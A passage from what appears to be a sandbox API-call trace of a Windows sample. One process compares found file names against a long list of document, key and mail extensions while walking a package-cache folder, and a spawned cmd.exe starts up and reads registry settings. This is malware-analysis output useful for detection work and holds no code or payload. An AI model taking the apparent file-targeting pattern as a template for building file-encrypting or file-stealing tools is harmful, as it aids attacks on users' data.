lstrcmpiW (lpString1=".pct", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pcx", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pdd", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pdp", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pef", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pem", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".pff", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".pfm", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".pfx", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".pgm", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".php", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".php3", lpString2="4.msu") returned -1 [0056.066] lstrcmpiW (lpString1=".php4", lpString2="4.msu") returned -1 [0056.066] lstrcmpiW (lpString1=".php5", lpString2="4.msu") returned -1 [0056.066] lstrcmpiW (lpString1=".phtml", lpString2="64.msu") returned -1 [0056.066] lstrcmpiW (lpString1=".pict", lpString2="4.msu") returned -1 [0056.066] lstrcmpiW (lpString1=".pl", lpString2="msu") returned -1 [0056.066] lstrcmpiW (lpString1=".pls", lpString2=".msu") returned 1 [0056.066] lstrcmpiW (lpString1=".pm", lpString2="msu") returned -1 [0056.067] lstrcmpiW (lpString1=".png", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".pnm", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".pot", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".potm", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".potx", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".ppa", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".ppam", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".ppm", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".pps", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".ppsm", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0056.067] lstrcmpiW (lpString1=".pptm", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".pptx", lpString2="4.msu") returned -1 [0056.067] lstrcmpiW (lpString1=".prn", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".ps", lpString2="msu") returned -1 [0056.068] lstrcmpiW (lpString1=".psb", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".psd", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".pst", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".ptx", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".pub", lpString2=".msu") returned 1 [0056.068] lstrcmpiW (lpString1=".pwm", lpString2=".msu") returned 1 [0056.069] FindNextFileW (in: hFindFile=0x42320d8, lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0056.069] FindClose (in: hFindFile=0x42320d8 | out: hFindFile=0x42320d8) returned 1 [0056.069] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a40060 | out: hHeap=0xb10000) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x42323d8, lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0056.069] FindClose (in: hFindFile=0x42323d8 | out: hFindFile=0x42323d8) returned 1 [0056.069] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a30058 | out: hHeap=0xb10000) returned 1 [0056.069] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0056.069] FindClose (in: hFindFile=0x4232358 | out: hFindFile=0x4232358) returned 1 [0056.069] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a20050 | out: hHeap=0xb10000) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0056.070] FindClose (in: hFindFile=0x4232298 | out: hFindFile=0x4232298) returned 1 [0056.070] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x4232218, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0056.070] lstrlenW (lpString="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 69 [0056.070] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0056.070] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.070] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0056.070] lstrlenW (lpString="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 78 [0056.071] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232358 [0056.071] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.071] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0056.071] lstrlenW (lpString="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 84 [0056.071] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42323d8 [0056.071] FindNextFileW (in: hFindFile=0x42323d8, lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.071] FindNextFileW (in: hFindFile=0x42323d8, lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0056.071] lstrlenW (lpString="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 88 [0056.071] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42320d8 [0056.072] FindNextFileW (in: hFindFile=0x42320d8, lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.072] FindNextFileW (in: hFindFile=0x42320d8, lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0056.072] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0056.072] lstrlenW (lpString=".1cd") returned 4 Thread: id = 25 os_tid = 0x9f0 Thread: id = 26 os_tid = 0xa00 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4d95a000" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x96c [0033.273] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fc90 | out: lpSystemTimeAsFileTime=0x31fc90*(dwLowDateTime=0x3e7d33b0, dwHighDateTime=0x1d5351d)) [0033.273] GetCurrentProcessId () returned 0x968 [0033.274] GetCurrentThreadId () returned 0x96c [0033.274] GetTickCount () returned 0x18bab [0033.274] QueryPerformanceCounter (in: lpPerformanceCount=0x31fc98 | out: lpPerformanceCount=0x31fc98*=15341354267) returned 1 [0033.274] GetModuleHandleW (lpModuleName=0x0) returned 0x4a420000 [0033.275] __set_app_type (_Type=0x1) [0033.275] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a447810) returned 0x0 [0033.275] __getmainargs (in: _Argc=0x4a46a608, _Argv=0x4a46a618, _Env=0x4a46a610, _DoWildCard=0, _StartInfo=0x4a44e0f4 | out: _Argc=0x4a46a608, _Argv=0x4a46a618, _Env=0x4a46a610) returned 0 [0033.275] GetCurrentThreadId () returned 0x96c [0033.275] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x96c) returned 0x3c [0033.276] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0033.276] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0033.276] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.276] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0033.276] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31fc28 | out: phkResult=0x31fc28*=0x0) returned 0x2 [0033.276] VirtualQuery (in: lpAddress=0x31fc10, lpBuffer=0x31fb90, dwLength=0x30 | out: lpBuffer=0x31fb90*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0033.276] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31fb90, dwLength=0x30 | out: lpBuffer=0x31fb90*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0033.276] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31fb90, dwLength=0x30 | out: lpBuffer=0x31fb90*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0033.276] VirtualQuery (in: lpAddress=0x224000, lpBuffer=0x31fb90, dwLength=0x30 | out: lpBuffer=0x31fb90*(BaseAddress=0x224000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0033.277] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31fb90, dwLength=0x30 | out: lpBuffer=0x31fb90*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0033.277] GetConsoleOutputCP () returned 0x1b5 [0033.277] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a45bfe0 | out: lpCPInfo=0x4a45bfe0) returned 1 [0033.277] SetConsoleCtrlHandler (HandlerRoutine=0x4a443184, Add=1) returned 1 [0033.277] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.277] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0033.277] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.277] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a44e194 | out: lpMode=0x4a44e194) returned 0 [0033.277] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.277] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a44e198 | out: lpMode=0x4a44e198) returned 0 [0033.278] GetEnvironmentStringsW () returned 0xd8a60* [0033.278] GetProcessHeap () returned 0xc0000 [0033.278] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa7c) returned 0xd94f0 [0033.278] FreeEnvironmentStringsW (penv=0xd8a60) returned 1 [0033.278] GetProcessHeap () returned 0xc0000 [0033.278] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x8) returned 0xd88e0 [0033.278] GetEnvironmentStringsW () returned 0xd8a60* [0033.278] GetProcessHeap () returned 0xc0000 [0033.278] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa7c) returned 0xd9f80 [0033.278] FreeEnvironmentStringsW (penv=0xd8a60) returned 1 [0033.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31eae8 | out: phkResult=0x31eae8*=0x44) returned 0x0 [0033.278] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x18, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.278] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x1, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x1, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x0, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x40, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x40, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x40, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.279] RegCloseKey (hKey=0x44) returned 0x0 [0033.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31eae8 | out: phkResult=0x31eae8*=0x44) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x40, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x1, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x1, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x0, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x9, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x4, lpData=0x31eb00*=0x9, lpcbData=0x31eae4*=0x4) returned 0x0 [0033.279] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31eae0, lpData=0x31eb00, lpcbData=0x31eae4*=0x1000 | out: lpType=0x31eae0*=0x0, lpData=0x31eb00*=0x9, lpcbData=0x31eae4*=0x1000) returned 0x2 [0033.279] RegCloseKey (hKey=0x44) returned 0x0 [0033.279] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2282bb [0033.279] srand (_Seed=0x5d2282bb) [0033.279] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0033.279] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0033.280] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a45c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.280] GetProcessHeap () returned 0xc0000 [0033.280] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xdaa10 [0033.280] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdaa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0033.280] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0033.280] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0033.280] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0033.280] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0033.280] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0033.280] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0033.280] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0033.280] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0033.280] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0033.280] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0033.280] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0033.280] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0033.280] GetProcessHeap () returned 0xc0000 [0033.280] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd94f0 | out: hHeap=0xc0000) returned 1 [0033.280] GetEnvironmentStringsW () returned 0xd8a60* [0033.280] GetProcessHeap () returned 0xc0000 [0033.280] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa94) returned 0xdac30 [0033.281] FreeEnvironmentStringsW (penv=0xd8a60) returned 1 [0033.281] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0033.281] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0033.281] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0033.281] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0033.281] 